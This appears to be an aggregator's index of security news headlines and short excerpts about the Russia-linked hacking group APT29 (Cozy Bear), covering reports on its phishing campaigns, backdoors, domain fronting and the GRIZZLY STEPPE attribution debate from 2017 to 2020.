Security Affairs - Security Blog | UK NCSC blames Russia-linked APT29 for attacks on COVID-19 vaccine research | 2020-07-16T14:45:58+00:00 | https://securityaffairs.co/wordpress/105992/intelligence/ncsc-apt29-covid-19-vaccine.html?utm_source=rss&utm_medium=rss&utm_campaign=ncsc-apt29-covid-19-vaccine | www.secnews.physaphae.fr/article.php?IdArticle=1808154 | False None APT 29 None
IT Security Guru - Security Blog | Russian hackers noticed after being undetected for years | 2019-10-18T10:13:01+00:00 | https://www.itsecurityguru.org/2019/10/18/russian-hackers-noticed-after-being-undetected-for-years/?utm_source=rss&utm_medium=rss&utm_campaign=russian-hackers-noticed-after-being-undetected-for-years | www.secnews.physaphae.fr/article.php?IdArticle=1410802 | True Malware,Threat APT 29 None
InformationSecurityBuzzNews - Security News Site | Experts Comments: Sophisticated Russian Hacking Group Is back In Action Again | 2019-10-17T15:33:16+00:00 | https://www.informationsecuritybuzz.com/expert-comments/experts-comments-sophisticated-russian-hacking-group-is-back-in-action-again/ | www.secnews.physaphae.fr/article.php?IdArticle=1409440 | False None APT 29 None
Dark Reading - Informationweek Branch | Cozy Bear Emerges from Hibernation to Hack EU Ministries | 2019-10-17T10:45:00+00:00 | https://www.darkreading.com/threat-intelligence/cozy-bear-emerges-from-hibernation-to-hack-eu-ministries/d/d-id/1336111?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple | www.secnews.physaphae.fr/article.php?IdArticle=1409431 | False Hack APT 29 None
Bleeping Computer - American Magazine | Cozy Bear Russian Hackers Spotted After Staying Undetected for Years | 2019-10-17T09:39:47+00:00 | https://www.bleepingcomputer.com/news/security/cozy-bear-russian-hackers-spotted-after-staying-undetected-for-years/ | www.secnews.physaphae.fr/article.php?IdArticle=1409160 | False Malware,Threat APT 29 None
We Live Security - ESET antivirus software vendor | Operation Ghost: The Dukes aren't back – they never left | 2019-10-17T09:30:46+00:00 | http://feedproxy.google.com/~r/eset/blog/~3/ThDiJoYnG-U/ | www.secnews.physaphae.fr/article.php?IdArticle=1408711 | False Malware APT 29 None
Wired Threat Level - Security News | Russia's Cozy Bear Hackers Resurface With Clever New Tricks | 2019-10-17T09:30:00+00:00 | https://www.wired.com/story/cozy-bear-dukes-russian-hackers-new-tricks | www.secnews.physaphae.fr/article.php?IdArticle=1408770 | False None APT 29 None
01net. News - Security - French Magazine | Russian cyberspies attack European diplomats using steganography | 2019-10-17T01:21:19+00:00 | https://www.01net.com/actualites/les-cyberespions-russes-s-attaquent-aux-diplomates-europeens-par-steganographie-1788751.html | www.secnews.physaphae.fr/article.php?IdArticle=1410478 | False None APT 29 2.0000000000000000
ZD Net - IT Magazine | DNC says Russia tried to hack its servers again in November 2018 | 2019-01-19T00:27:03+00:00 | https://www.zdnet.com/article/dnc-says-russia-tried-to-hack-its-servers-again-in-november-2018/#ftag=RSSbaffb68 | www.secnews.physaphae.fr/article.php?IdArticle=999405 | False Hack APT 29 None
Security Affairs - Security Blog | Exclusive Cybaze ZLab – Yoroi – Hunting Cozy Bear, new campaign, old habits | 2018-11-23T10:38:04+00:00 | https://securityaffairs.co/wordpress/78353/apt/new-cozy-bear-campaign.html | www.secnews.physaphae.fr/article.php?IdArticle=913703 | False Malware APT 29 None
InformationSecurityBuzzNews - Security News Site | Cozy Bear Returns With Post-Election Spear-Phishing Campaign | 2018-11-21T13:15:04+00:00 | https://www.informationsecuritybuzz.com/expert-comments/cozy-bear-returns/ | www.secnews.physaphae.fr/article.php?IdArticle=910156 | False None APT 29 None
UnderNews - French "hacker" news site | FireEye publishes a new report on phishing activity probably linked to the APT29 group | FireEye has just published a report on new phishing activity that is probably linked to the APT29 group. This report supplements FireEye's first finding, dated 14 November 2018, with more details. | 2018-11-20T18:03:04+00:00 | https://www.undernews.fr/reseau-securite/phishing-hoax/fireeye-publie-un-nouveau-rapport-sur-une-activite-de-phishing-probablement-liee-au-groupe-apt29.html | www.secnews.physaphae.fr/article.php?IdArticle=909042 | False None APT 29 None
Kaspersky Threatpost - Kaspersky is a Russian antivirus vendor | APT29 Re-Emerges After 2 Years with Widespread Espionage Campaign | 2018-11-20T18:01:01+00:00 | https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/ | www.secnews.physaphae.fr/article.php?IdArticle=908933 | False None APT 29 None
Wired Threat Level - Security News | Russia's Fancy Bear and Cozy Bear Hackers May Have New Phishing Tricks | 2018-11-20T14:16:01+00:00 | https://www.wired.com/story/russia-fancy-bear-hackers-phishing | www.secnews.physaphae.fr/article.php?IdArticle=908650 | False None APT 29,APT 28 None
Mandiant - Mandiant Security Blog | Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign | Introduction. FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting. The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon. Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29. APT29 | 2018-11-19T22:00:00+00:00 | https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign | www.secnews.physaphae.fr/article.php?IdArticle=8377724 | False None APT 29,APT 29 4.0000000000000000
Security Affairs - Security Blog | Cybaze ZLab – Yoroi team analyzed malware used in recent attacks on US entities attributed to APT29 | 2018-11-19T13:27:04+00:00 | https://securityaffairs.co/wordpress/78195/apt/apt29-malware-analysis.html | www.secnews.physaphae.fr/article.php?IdArticle=906670 | False Malware APT 29 None
Security Affairs - Security Blog | Suspected APT29 hackers behind attacks on US gov agencies, think tanks, and businesses | 2018-11-18T09:35:00+00:00 | https://securityaffairs.co/wordpress/78161/intelligence/apt29-impersonates-state-department.html | www.secnews.physaphae.fr/article.php?IdArticle=904245 | False Threat APT 29 None
ZD Net - IT Magazine | Russian APT comes back to life with new US spear-phishing campaign | 2018-11-16T23:40:00+00:00 | https://www.zdnet.com/article/russian-apt-comes-back-to-life-with-new-us-spear-phishing-campaign/#ftag=RSSbaffb68 | www.secnews.physaphae.fr/article.php?IdArticle=901452 | False None APT 29 None
The Last Watchdog - Byron V Acohido's Security Blog | NEWS WRAP-UP: Dutch spies corroborate Russia's meddling in U.S. election - and 19 EU nations | 2018-02-02T21:29:09+00:00 | http://www.lastwatchdog.com/news-wrap-up-dutch-spies-corroborate-russias-meddling-in-u-s-election-and-19-eu-nations/ | www.secnews.physaphae.fr/article.php?IdArticle=464050 | False None APT 29 None
Zataz - French Security Magazine | Dutch secret services infiltrate Cozy Bear | Take a puff, it's Cozy Bear! The Dutch intelligence services reportedly provided crucial evidence to their American counterparts about Russia's interference in the 2016 elections. Now that is interesting. The American secret services would not be the authors of the inf... The article Dutch secret services infiltrate Cozy Bear appeared first on ZATAZ. | 2018-01-28T13:23:51+00:00 | https://www.zataz.com/services-secrets-neerlandais-cozy-bear/ | www.secnews.physaphae.fr/article.php?IdArticle=460841 | False None APT 29 None
The Security Ledger - Security Blog | The Dutch were spying on Cozy Bear Hackers as they targeted Democrats | 2018-01-26T17:05:41+00:00 | https://feeds.feedblitz.com/~/520448790/0/thesecurityledger~The-Dutch-were-spying-on-Cozy-Bear-Hackers-as-they-targeted-Democrats/ | www.secnews.physaphae.fr/article.php?IdArticle=460831 | False None APT 29 None
Dark Reading - Informationweek Branch | Dutch Intel Agency Reportedly Helped US Attribute DNC Hack to Russia | 2018-01-26T14:45:00+00:00 | https://www.darkreading.com/attacks-breaches/dutch-intel-agency-reportedly-helped-us-attribute-dnc-hack-to-russia/d/d-id/1330921?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple | www.secnews.physaphae.fr/article.php?IdArticle=461026 | False None APT 29 None
IT Security Guru - Security Blog | Dutch intelligence agency spied on and took photos of Russia-linked Cozy Bear hackers | In 2014, Dutch intelligence agency AIVD reportedly managed to locate the hub of the Kremlin-linked hacker group Cozy Bear, also known as APT29. AIVD reportedly gained access to the state-sponsored hacker group's networks and spied on Cozy Bear's hacking activities in a cyberespionage campaign that is believed to have lasted between one and two and ... | 2018-01-26T11:37:18+00:00 | http://www.itsecurityguru.org/2018/01/26/dutch-intelligence-agency-spied-took-photos-russia-linked-cozy-bear-hackers/ | www.secnews.physaphae.fr/article.php?IdArticle=460648 | False None APT 29 2.0000000000000000
Security Affairs - Security Blog | The Dutch intelligence service AIVD 'hacked' Russian Cozy Bear systems for years | 2018-01-26T10:40:29+00:00 | http://securityaffairs.co/wordpress/68241/intelligence/aivd-hacked-cozy-bear.html | www.secnews.physaphae.fr/article.php?IdArticle=460608 | False None APT 29 None
Contagio - Ransomware news site | Part II. APT29 Russian APT including Fancy Bear | This is the second part of the Russian APT series. "APT29 - The Dukes Cozy Bear: APT29 is a threat group that has been attributed to the Russian government and has operated since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015" (src. Mitre ATT&CK). Please see the first post here: Russian APT - APT28 collection of samples including OSX XAgent. I highly recommend reading and studying these resources first: Mitre ATT&CK; 2017-03 Disinformation. A Primer In Russian Active Measures And Influence Campaigns. Hearings before the Select Committee on Intelligence, March 2017; 2014-08 Mikko Hypponen. Governments as Malware Authors. Presentation ppt.; 2016. No Easy Breach: Challenges and Lessons from an Epic Investigation. Mandiant. Matthew Dunwoody, Nick Carr. Video; Beyond 'Cyber War': Russia's Use of Strategic Cyber Espionage and Information Operations in Ukraine. NATO Cooperative Cyber Defence Centre of Excellence / Fireeye - Jen Weedon. List of References (and samples mentioned) listed from oldest to newest: 2012-02 FSecure. COZYDUKE; 2013-02_Crysys_Miniduke Indicators; 2013-04_Bitdefender_A Closer Look at MiniDuke; 2014-04 FSecure_Targeted Attacks and Ukraine; 2014-05_FSecure.Miniduke still duking it out; 2014-07_Kaspersky_Miniduke is back_Nemesis Gemina and the Botgen Studio; 2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day; 2014-11_FSecure_OnionDuke APT Attacks Via the Tor Network; 2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke; 2015-04_Kaspersky_CozyDuke-CozyBear | 2017-04-05T22:57:33+00:00 | http://contagiodump.blogspot.com/2017/03/part-ii-apt29-russian-apt-including.html | www.secnews.physaphae.fr/article.php?IdArticle=358910 | False None APT 29,APT 28 None
SecurityWeek - Security News | APT29 Uses Stealthy Backdoor to Maintain Access to Targets | 2017-04-03T12:42:42+00:00 | http://feedproxy.google.com/~r/Securityweek/~3/LKmUpdl9NI0/apt29-uses-stealthy-backdoor-maintain-access-targets | www.secnews.physaphae.fr/article.php?IdArticle=351466 | False None APT 29 None
Mandiant - Mandiant Security Blog | Dissecting One of APT29's Fileless WMI and PowerShell Backdoors (POSHSPY) | Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY. POSHSPY leverages two of the tools the group frequently uses: PowerShell and Windows Management Instrumentation (WMI). In the investigations Mandiant has conducted, it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors. POSHSPY makes the most of using built-in Windows features – so-called "living off the land" – to make an especially stealthy backdoor. POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone | 2017-04-03T07:00:00+00:00 | https://www.mandiant.com/resources/blog/dissecting-one-ofap | www.secnews.physaphae.fr/article.php?IdArticle=8377785 | False Tool,Technical APT 29 4.0000000000000000
Contagio - Ransomware news site | Part I. Russian APT - APT28 collection of samples including OSX XAgent | This post is for all of you, Russian malware lovers/haters. Analyze it all to your heart's content. Prove or disprove Russian hacking in general or DNC hacking in particular, or find that "400 lb hacker" or nail another country altogether. You can also have fun and exercise your malware analysis skills without any political agenda. The post contains malware samples analyzed in the APT28 reports linked below. I will post APT29 and others later. Read about groups and types of targeted threats here: Mitre ATT&CK. List of References (and samples mentioned) listed from oldest to newest: APT28_2011-09_Telus_Trojan.Win32.Sofacy.A; APT28_2014-08_MhtMS12-27_Prevenity; APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations; APT28_2014-10_Telus_Coreshell.A; APT28_2014-10_TrendMicro Operation Pawn Storm Using Decoys to Evade Detection; APT28_2015-07_Digital Attack on German Parliament; APT28_2015-07_ESET_Sednit_meet_Hacking; APT28_2015-07_Telus_Trojan-Downloader.Win32.Sofacy.B; APT28_2015-09_Root9_APT28_Technical_Followup; APT28_2015-09_SFecure_Sofacy-recycles-carberp-and-metasploit-code; APT28_2015-10_New Adobe Flash Zero-Day Used in Pawn Storm; APT28_2015-10_Root9_APT28_targets Financial Markets; APT28_2015-12_Bitdefender_In-depth_anal | 2017-03-31T02:03:28+00:00 | http://contagiodump.blogspot.com/2017/02/russian-apt-apt28-collection-of-samples.html | www.secnews.physaphae.fr/article.php?IdArticle=358911 | False None APT 29,APT 28 None
Kaspersky Threatpost - Kaspersky is a Russian antivirus vendor | APT29 Used Domain Fronting, Tor to Execute Backdoor | 2017-03-27T20:14:12+00:00 | https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/ | www.secnews.physaphae.fr/article.php?IdArticle=347686 | False None APT 29 None
SecurityWeek - Security News | APT29 Cyberspies Use Domain Fronting to Evade Detection | 2017-03-27T14:56:43+00:00 | http://feedproxy.google.com/~r/Securityweek/~3/WuZS5fGxCic/apt29-cyberspies-use-domain-fronting-evade-detection | www.secnews.physaphae.fr/article.php?IdArticle=346951 | False None APT 29 None
Mandiant - Mandiant Security Blog | APT29 Domain Fronting With TOR | Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years. There has been considerable discussion about domain fronting following the release of a paper detailing these techniques. Domain fronting provides outbound network connections that are indistinguishable from legitimate requests for popular websites. APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS | 2017-03-27T07:00:00+00:00 | https://www.mandiant.com/resources/blog/apt29-domain-frontin | www.secnews.physaphae.fr/article.php?IdArticle=8377787 | False None APT 29,APT 29 4.0000000000000000
SecurityWeek - Security News | DHS Uses Cyber Kill Chain to Analyze Russia-Linked Election Hacks | 2017-02-13T16:52:34+00:00 | http://feedproxy.google.com/~r/Securityweek/~3/ZMjfdMqZfPk/dhs-uses-cyber-kill-chain-analyze-russia-linked-election-hacks | www.secnews.physaphae.fr/article.php?IdArticle=313106 | False None APT 29,APT 28 None
The State of Security - American Magazine | 10 Questions that Need to Be Asked about Every Cybersecurity Story | 2017-01-11T04:00:46+00:00 | https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/10-questions-that-need-to-be-asked-about-every-cybersecurity-story/ | www.secnews.physaphae.fr/article.php?IdArticle=289173 | False None APT 29,APT 28 None
Dark Reading - Informationweek Branch | DHS-FBI Report Shows Russian Attribution's A Bear | 2017-01-04T17:40:00+00:00 | http://www.darkreading.com/threat-intelligence/dhs-fbi-report-shows-russian-attributions-a-bear/d/d-id/1327828?_mc=RSS_DR_EDT | www.secnews.physaphae.fr/article.php?IdArticle=285828 | False None APT 29,APT 28 None
Errata Security - Errata Security | Dear Obama, From Infosec | Instead of communicating with the American people, you worked through your typical system of propaganda, such as stories in the New York Times quoting unnamed "senior government officials". We don't want "unnamed" officials -- we want named officials (namely you) who we can pin down and question. When you work through this system of official leaks, we believe you have something to hide, that the evidence won't stand on its own. We still don't believe the CIA's conclusions because we don't know, precisely, what those conclusions are. Are they derived purely from companies like FireEye and CrowdStrike based on digital forensics? Or do you have spies in Russian hacker communities that give better information? This is such an important issue that it's worth degrading sources of information in order to tell us, the American public, the truth. You had the DHS and US-CERT issue the "GRIZZLY STEPPE" report "attributing those compromises to Russian malicious cyber activity". It does nothing of the sort. It's full of garbage. It contains signatures of viruses that are publicly available, used by hackers around the world, not just Russia. It contains a long list of IP addresses from perfectly normal services, like Tor, Google, Dropbox, Yahoo, and so forth. Yes, hackers use Yahoo for phishing and malvertising. It doesn't mean every access of Yahoo is an "Indicator of Compromise". For example, I checked my web browser [chrome://net-internals/#dns] and found that last year on November 20th, it accessed two IP addresses that are on the Grizzly Steppe list: No, this doesn't mean I've been hacked. It means I just had a normal interaction with Yahoo. It means the Grizzly Steppe IoCs are garbage. If your intent was to show technical information to experts to confirm Russia's involvement, you've done the precise opposite. Grizzly Steppe proves such enormous incompetence that we doubt all the technical details you might have. I mean, it's possible that you classified the important details and de-classified the junk, but even then, that junk isn't worth publishing. There's no excuse for those Yahoo addresses to be in there, or the numerous other problems. Among the consequences is that Washington Post story claiming Russians hacked into the Vermont power grid. What really happened is that somebody just checked their Yahoo email, thereby accessing one of the same IP addresses I did. How they get from the facts (one person accessed Yahoo email) to the story (Russians hacked power grid) is your responsibility. This misinformation is your fault. You announced sanctions for the Russian hacking [*]. At the same time, you announced sanctions for Russian harassment of diplomati | 2017-01-03T21:33:01+00:00 | http://blog.erratasec.com/2017/01/dear-obama-from-infosec.html | www.secnews.physaphae.fr/article.php?IdArticle=284726 | False None Yahoo,APT 29,APT 28 None
SecurityWeek - Security News | U.S. Gov's "GRIZZLY STEPPE" Report Fails to Achieve Purpose: Experts | Joint Analysis Report (JAR) published by the Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) to detail tools used by Russian hackers in cyber attacks against the United States election didn't deliver on its promise, security experts argue. | 2017-01-02T16:29:22+00:00 | http://feedproxy.google.com/~r/Securityweek/~3/NJpEfw0rqRs/us-govs-grizzly-steppe-report-fails-achieve-purpose-experts | www.secnews.physaphae.fr/article.php?IdArticle=283705 | False None APT 29,APT 28 None